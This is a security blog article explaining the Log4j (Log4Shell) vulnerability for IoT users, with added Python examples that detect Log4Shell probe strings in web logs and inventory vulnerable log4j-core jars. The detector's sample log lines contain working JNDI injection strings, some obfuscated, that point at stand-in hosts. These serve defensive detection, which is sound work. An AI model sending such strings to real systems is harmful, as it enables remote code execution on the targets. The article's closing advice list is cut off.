By Rebecca Herold
Last updated: December 28, 2021
Many of our Privacy and Security Brainiacs and Privacy Professor consultancy clients have asked for a simple description of the Log4j problems they’ve seen so much about in the news lately. Here are some key facts and advice we’ve provided to them.
Summarized with extreme simplicity, the Log4j security vulnerability (tracked as CVE-2021-44228 and widely called Log4Shell) is ultimately a result of insufficient secure coding and/or testing practices for a software component that is used in billions of devices worldwide. The flaw sits in a feature that was switched on by default: when certain text is written into a log, Log4j treats part of that text as an instruction to look up and load code from a location the text names. An attacker who can get such text logged, for example by typing it into a login form or sending it in a web request, can therefore make the vulnerable software download and run the attacker's code. The flaw is now being actively exploited, causing a wide variety of security incidents and privacy breaches.
Log4j is an open source logging library, written in Java and maintained by volunteers of the Apache Software Foundation who are recognized programming experts. It is not a stand-alone application; it is a component that other software embeds to create activity logs, and because it is Java code it runs wherever Java does, including Apple, Windows, and Linux systems and the embedded systems inside many devices. The logs provide activity details that can be used to troubleshoot problems, track data within the devices from which Log4j is used, or for other purposes. Log4j has been the de facto logging code within a huge number of software programs throughout the world because the logs are extremely useful for troubleshooting software problems. Possibly an even bigger reason it is so widely used is that, being open source, Log4j is free to use. The affected versions are Log4j 2 releases 2.0-beta9 through 2.14.1; the older Log4j 1.x line does not contain this particular flaw, but it is no longer maintained and has other known problems.
Let’s consider just a few facts, and then associated risks that exist to IoT products and their users as a result of the Log4j vulnerability. First a few facts:
IoT devices impact people's lives worldwide. There are IoT devices that control:
1) temperatures in homes and other types of buildings;
2) personal assistants through voice controls;
3) smart locks;
4) smoke and fire alarms;
5) smart electricity plugs and universal entertainment system remotes;
6) traffic lights;
7) Wi-Fi systems;
8) security systems;
9) garage door openers;
10) fitness trackers;
11) medical devices that are keeping people alive;
12) and a seemingly endless list of other types of IoT devices.
Essentially, the Log4j vulnerability gives intruders a wide-open digital door, from wherever they are in the world, into your networks and devices. They need no password and no prior foothold: one crafted message that the device happens to log is enough. Once they are inside, they can wreak havoc by causing a wide range of harms: stealing, modifying, and deleting data; planting ransomware, malware, bots, spyware, and killware (which is a quickly growing concern); launching attacks on other networks from your devices to cover their tracks and make it look like you were the attacker; and bringing down networks and critical infrastructure to disrupt operations and disable systems that the public depends upon for safety and health.
Cybersecurity researchers are seeing cybercrooks actively scanning for and exploiting products that use Log4j, not only to attack the businesses running those products, but also to use those business networks as gateways into the other organizations connected to them. Some attacks aim simply to crash or disrupt the software for anyone using it. Given these facts, the potential harms are huge: disruption of services, risks to the health and safety of people depending on them, and exposure of the data collected through them.
It is ultimately the responsibility of the manufacturers whose software embeds the vulnerable Log4j versions to fix those products as soon as possible, and of IoT product providers to ensure their products are updated as soon as possible. The real fix is to upgrade the embedded Log4j to a patched release (2.17.0 or later at the time of writing); early advice to work around the problem with a configuration setting that disables message lookups was later found to be incomplete, so a configuration change alone should not be treated as a fix, and Apache's documented fallback for a library that cannot be upgraded right away is to remove the JndiLookup class from it. But how quickly will manufacturers fix their products? That will vary from manufacturer to manufacturer, and product to product.
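What active exploitation looks like in practice, as an added example that is not part of the original article: the Python below runs over a handful of constructed web-server access log lines and flags the ones carrying a Log4j JNDI lookup string, including the URL-encoded and nested-lookup obfuscations attackers use to slip past naive keyword matching. The log lines, the addresses (documentation ranges) and the obfuscation patterns are constructed for illustration; the only thing taken from Log4j itself is its ${...} lookup syntax. Detection of this kind tells you whether you are being probed; it is not a substitute for patching, because obfuscation variants keep evolving.

```python
"""Added example: spotting Log4Shell probe strings in web-server access logs.
Constructed for this page; not code from the original article."""
import re
from urllib.parse import unquote

# Constructed sample log lines (combined log format). 198.51.100.0/24 and
# 203.0.113.0/24 are documentation address ranges, not real attackers.
# Lines 2-4 carry the exploit pattern in different places: the User-Agent
# header, a query string, and a URL-encoded query string that also hides
# the word "jndi" behind a nested lookup. Lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.7:1099/b} HTTP/1.1" 404 210 "-" "curl/7.79"',
    '198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 200 300 "-" "curl/7.79"',
    '10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "GET /?s=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

# Log4j resolves nested lookups before it performs the JNDI lookup, so
# attackers hide "jndi" behind ${lower:j}, ${upper:J} or the default-value
# form ${anything:-j}. The two alternatives below undo those forms.
OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.I)
# What remains after normalization: ${jndi:<scheme>:...
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(text):
    """Decode URL escapes, then repeatedly collapse the obfuscation lookups
    (innermost first, as Log4j's substitution does) until nothing changes.
    Every substitution shortens the string, so the loop terminates."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def find_log4shell_attempts(lines):
    """Return (line number, scheme, normalized excerpt) for each line whose
    normalized form contains a JNDI lookup. Ordinary lookups such as
    ${date:yyyy} are not flagged."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        match = JNDI_LOOKUP.search(norm)
        if match:
            excerpt = norm[match.start():match.start() + 60]
            hits.append((number, match.group(1).lower(), excerpt))
    return hits


if __name__ == "__main__":
    for number, scheme, excerpt in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi:{scheme} lookup -> {excerpt}")
```

Feed it real access, application or proxy logs one line at a time. The normalization step matters more than the final regex: a rule that only looks for the literal text "${jndi:" misses lines 3 and 4 entirely, which is exactly what the obfuscation is for.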
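While waiting for vendors, an organization can at least find out where vulnerable copies of the library sit on its own systems. The Python below is an added example, not code from the original article or from the Log4j project: it walks a directory tree, opens every jar, war and ear (and the archives nested inside them, which is where embedded copies usually hide), reads the version recorded in log4j-core's pom.properties, checks whether the JndiLookup class is still present, and classifies each find. The version thresholds and the meaning of the missing class are stated from the Apache advisories as of late December 2021, not from the article; the sample jars it scans are constructed stand-ins with no real bytecode.

```python
"""Added example: inventory scan for vulnerable log4j-core jars, including
jars nested inside wars/ears/fat jars. Constructed for this page; not code
from the original article or from the Log4j project."""
import io
import os
import re
import tempfile
import zipfile

# Paths inside a log4j-core jar. pom.properties records the exact version;
# JndiLookup.class is the class Apache's documented fallback mitigation
# tells you to delete from jars you cannot upgrade right away.
POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def version_key(version):
    """Sortable key for version strings such as '2.14.1' or '2.0-beta9';
    pre-release qualifiers sort before the final release of the same number."""
    base, _, qualifier = version.partition("-")
    nums = [int(p) for p in base.split(".") if p.isdigit()]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]) + ((0, qualifier) if qualifier else (1, ""))


def assess(version, jndi_lookup_present):
    """Classify one log4j-core jar. Facts as of late December 2021 (stated
    here, not taken from the article): CVE-2021-44228 affects 2.0-beta9
    through 2.14.1; 2.15.0 and 2.16.0 fixed it incompletely (CVE-2021-45046,
    CVE-2021-45105), so anything below 2.17.0 should still be upgraded; a
    2.x jar with JndiLookup.class removed cannot reach the JNDI code path."""
    if version == "unknown":
        return "unknown-version"
    key = version_key(version)
    if key >= version_key("2.17.0"):
        return "ok"
    if key >= version_key("2.15.0"):
        return "upgrade-recommended"
    return "vulnerable" if jndi_lookup_present else "mitigated-class-removed"


def scan_archive(data, name, findings):
    """Record any log4j-core at the top level of one archive, then recurse
    into the archives nested inside it (fat jars, wars, ears)."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with archive:
        names = set(archive.namelist())
        if POM_PATH in names:
            props = archive.read(POM_PATH).decode("utf-8", "replace")
            match = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = match.group(1).strip() if match else "unknown"
            findings.append((name, version, assess(version, JNDI_CLASS in names)))
        for inner in names:
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(archive.read(inner), f"{name}!{inner}", findings)


def scan_tree(root):
    """Return sorted (location, version, verdict) triples for a directory tree.
    Log4j 1.x jars are not reported: they have no log4j-core pom.properties
    and are not affected by CVE-2021-44228."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                location = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), location, findings)
    return sorted(findings)


def make_jar(version, include_jndi):
    """Constructed stand-in for a log4j-core jar: pom.properties plus an
    optional placeholder JndiLookup.class entry (no real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(POM_PATH, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            archive.writestr(JNDI_CLASS, b"placeholder")
    return buf.getvalue()


def demo():
    """Build a constructed sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        samples = {
            "lib/log4j-core-2.14.1.jar": make_jar("2.14.1", True),
            "lib/log4j-core-2.14.1-patched.jar": make_jar("2.14.1", False),
            "lib/log4j-core-2.17.1.jar": make_jar("2.17.1", True),
        }
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        war = io.BytesIO()  # a web app bundling its own copy of log4j-core
        with zipfile.ZipFile(war, "w") as archive:
            archive.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", make_jar("2.16.0", True))
        with open(os.path.join(root, "app.war"), "wb") as fh:
            fh.write(war.getvalue())
        return scan_tree(root)


if __name__ == "__main__":
    for location, version, verdict in demo():
        print(f"{verdict:24} {version:8} {location}")
```

Point scan_tree at a real application or firmware tree (for example an extracted device image) to get the same triples for your own systems. The scanner keys on the internal pom.properties rather than the filename, so a renamed or repackaged copy is still found, but a jar whose pom.properties was stripped is not reported at all; treat the result as a first pass, not a complete inventory.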
We encourage consumers of IoT products (organizations as well as individuals), and of all other types of software and hardware, to be proactive. If you are such a consumer:
NOTE:
Images above may have been created by us or purchased; others, such as the Log4j logo, are used under the U.S. Fair Use doctrine (Section 107 of the Copyright Act). Privacy and Security Brainiacs is not associated with or sponsored by the trademark owners of the images used under Fair Use.